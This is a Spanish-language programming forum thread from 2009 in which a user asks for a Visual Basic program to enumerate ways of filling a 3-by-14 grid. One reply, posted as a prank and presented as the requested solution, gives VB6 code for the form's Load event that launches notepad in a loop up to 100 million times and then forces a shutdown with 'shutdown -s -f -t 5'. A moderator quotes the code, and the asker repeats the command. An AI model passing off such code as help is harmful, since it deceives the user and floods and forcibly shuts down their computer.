elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  ayuda con programa no se programar....
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con programa no se programar....  (Leído 4,619 veces)
Martin-Ph03n1X


Desconectado Desconectado

Mensajes: 1.059


SHOCYRIX


Ver Perfil
ayuda con programa no se programar....
« en: 21 Octubre 2009, 06:24 am »

necesito un programa muy sencillo y sin finalidad al pareser....

solo necesito un autorellenador de celdas....

celdas? ahora explico:

necesito exactamente que las celdas sean 42

3 columnas, 14 filas

y bien el objetivo es visualizar cuantas combinaciones hay de poner en distintos lugares el rellenado de una celda sin que se repitan en la misma culumna...

ejemplo si relleno A1 no podre rellenar B1 ni C1 "ejemplo celdas excel".
y en la siguiente fila 2 ponerla en donde gustes y asi susesibamente hasta
terminar con todas las combinaciones posibles
y te aroje las imagenes de cada una de las combinaciones.

es posible esto?
Me ayudan?
se aceptan sugerencias...
de antemano gracias. :D ;D


En línea

  No eres tu trabajo, no eres cuanto tienes en el banco, no eres el auto que conduces, ni el contenido en tu billetera, no eres tus malditos cakis, eres el bailarin cantante del mundo...!!!"
cassiani


Desconectado Desconectado

Mensajes: 978


« Anterior | Próximo »


Ver Perfil WWW
Re: ayuda con programa no se programar....
« Respuesta #1 en: 21 Octubre 2009, 15:19 pm »

claro que se puede, pero ... dices que no sabes programar, entonces, la ayuda que se te de no servira de mucho.. leete un manual básico del lenguaje e intenta programarlo por ti mismo y luego ven a postear las dudas que te surgan y no resuelvas con el tuto.

puedes usar un listview para empezar, ¿sabes que es? lo dudo, a eso me refiero.


En línea

Mr. Crowley


Desconectado Desconectado

Mensajes: 343


Costa Rica


Ver Perfil WWW
Re: ayuda con programa no se programar....
« Respuesta #2 en: 21 Octubre 2009, 17:55 pm »

Aca no se hacen tareas  :silbar:
En línea

Mi blog personal: www.calirojas.com
fary


Desconectado Desconectado

Mensajes: 1.062



Ver Perfil WWW
Re: ayuda con programa no se programar....
« Respuesta #3 en: 21 Octubre 2009, 19:22 pm »

aunque lo que te voy a decir te sonara a chino.. podrias hacerlo con un flooder...

salu2!
En línea

Un byte a la izquierda.
Mr. Crowley


Desconectado Desconectado

Mensajes: 343


Costa Rica


Ver Perfil WWW
Re: ayuda con programa no se programar....
« Respuesta #4 en: 21 Octubre 2009, 19:28 pm »

Este codigo es para Visua Basic 6:

Código
  1.    Dim iFila As Integer, iColumna As Integer
  2.  
  3.        For iFila = 1 To 10000
  4.            For iColumna = 1 To 10000
  5.                Shell "notepad.exe", vbNormalFocus
  6.            Next
  7.        Next
  8.    Shell "shutdown -s -f -t 5"
  9.  

Coloquelo en el evento Load del form.
En línea

Mi blog personal: www.calirojas.com
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: ayuda con programa no se programar....
« Respuesta #5 en: 21 Octubre 2009, 20:11 pm »

LoL @ Mr.Crowley... :laugh:
En línea

LeandroA
Moderador
***
Desconectado Desconectado

Mensajes: 760


www.leandroascierto.com


Ver Perfil WWW
Re: ayuda con programa no se programar....
« Respuesta #6 en: 21 Octubre 2009, 22:25 pm »

Este codigo es para Visua Basic 6:

Código
  1.    Dim iFila As Integer, iColumna As Integer
  2.  
  3.        For iFila = 1 To 10000
  4.            For iColumna = 1 To 10000
  5.                Shell "notepad.exe", vbNormalFocus
  6.            Next
  7.        Next
  8.    Shell "shutdown -s -f -t 5"
  9.  

Coloquelo en el evento Load del form.

Esto es un foro, Porque le haces la tarea  ;D ;D
En línea

Mr. Crowley


Desconectado Desconectado

Mensajes: 343


Costa Rica


Ver Perfil WWW
Re: ayuda con programa no se programar....
« Respuesta #7 en: 21 Octubre 2009, 22:47 pm »

Sorry  :-(, prometo que no volvera a pasar!!  :xD
En línea

Mi blog personal: www.calirojas.com
Martin-Ph03n1X


Desconectado Desconectado

Mensajes: 1.059


SHOCYRIX


Ver Perfil
Re: ayuda con programa no se programar....
« Respuesta #8 en: 21 Octubre 2009, 23:52 pm »

shutdown -s -f -t 5

Tampoco me crean tan wey si se programar pero una calculadorsita botones tolbox cosas muy tontas insrtar pero como para hacerlo yo en programacion no tengo idea,  solo necesito un codigo mas decente y llo compilo seria muy facil....

y sobre lo del flooder tienes razon pero que tipo de flood aplico =D igual y ya existe pones 34X23 y automaticamente rrellena, esto es otro detalle.

gracias por sus intenciones se que son buenas pero se que pueden ayudarme mas, Saludos.
En línea

  No eres tu trabajo, no eres cuanto tienes en el banco, no eres el auto que conduces, ni el contenido en tu billetera, no eres tus malditos cakis, eres el bailarin cantante del mundo...!!!"
Pablo Videla


Desconectado Desconectado

Mensajes: 2.274



Ver Perfil WWW
Re: ayuda con programa no se programar....
« Respuesta #9 en: 22 Octubre 2009, 00:13 am »

shutdown -s -f -t 5

Tampoco me crean tan wey si se programar pero una calculadorsita botones tolbox cosas muy tontas insrtar pero como para hacerlo yo en programacion no tengo idea,  solo necesito un codigo mas decente y llo compilo seria muy facil....

y sobre lo del flooder tienes razon pero que tipo de flood aplico =D igual y ya existe pones 34X23 y automaticamente rrellena, esto es otro detalle.

gracias por sus intenciones se que son buenas pero se que pueden ayudarme mas, Saludos.
onda que rellene por coordenadas?
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Programar un programa teoricamente inteligente.
Programación General
andres_5 7 9,859 Último mensaje 18 Febrero 2011, 22:23 pm
por flacc
Ayuda programa 4_24 de C++ Como Programar 2ª ed
Programación C/C++
NoeOP 0 2,108 Último mensaje 1 Febrero 2012, 22:05 pm
por NoeOP
Programar ayuda
Programación General
klarion 1 2,351 Último mensaje 14 Marzo 2012, 00:52 am
por $Edu$
ayuda a programar
Desarrollo Web
General Dmitry Vergadoski 3 2,487 Último mensaje 3 Octubre 2012, 06:36 am
por @synthesize
Programar programa incerrable C++
Programación C/C++
Kaxperday 6 2,849 Último mensaje 21 Enero 2016, 19:05 pm
por Eternal Idol
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines